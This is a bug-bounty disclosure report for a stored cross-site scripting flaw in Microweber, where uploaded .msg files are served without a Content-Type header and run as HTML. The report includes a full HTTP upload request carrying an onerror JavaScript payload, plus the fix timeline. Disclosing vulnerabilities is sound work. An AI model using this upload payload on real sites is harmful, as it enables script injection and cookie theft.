Cross-site scripting - Stored via upload ".msg" file in microweber/microweber

Valid

Reported on

Apr 28th 2022

Description

When user upload file with .msg extension in white-list, but when access this file, server not reponse with Content-type header, so this file can execute javascript code as Content-type: text/html

Proof of Concept

POST /microweber/plupload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------28771568286742411163240611272
Content-Length: 613
Origin: http://localhost
Connection: close
Referer: http://localhost/microweber/admin/view:modules/load_module:users/edit-user:2
Cookie: lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; laravel_session=BnjV1FJreD5RFBkjkvb8pXOYFRSigS9UEohOssK0; csrf-token-data=%7B%22value%22%3A%22sgvKF9TERgDm9O13FiWEGxRvQFNAI8JvpRtqKnGo%22%2C%22expiry%22%3A1651144709625%7D; lang=en_US; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CZoRHz4Lp6Dw1kGoNmNjw8Bl9OnQxW9tsICXbPm45GY8PWB1MSkbLXzmWI5cV%7C%242y%2410%242mEkAOazLSPOHDj8x7C8ee06lkvn6Shka.Hdp6wt2g4k.j1maqtBS; back_to_admin=http%3A//localhost/microweber/admin/view%3Amodules/load_module%3Ausers/edit-user%3A2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="name"

exploit.msg
-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="chunk"

0
-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="chunks"

1
-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror=alert(window.origin) />
-----------------------------28771568286742411163240611272--

PoC Image

image image image

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the microweber team within 24 hours. a year ago
We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov modified the Severity from High to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.2.15 with commit 56c2db a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
Files.php#L1161 has been validated
Nhien.IT
a year ago

Researcher

Hi @admin @maintainer,

Can I get CVE for this report?

to join this conversation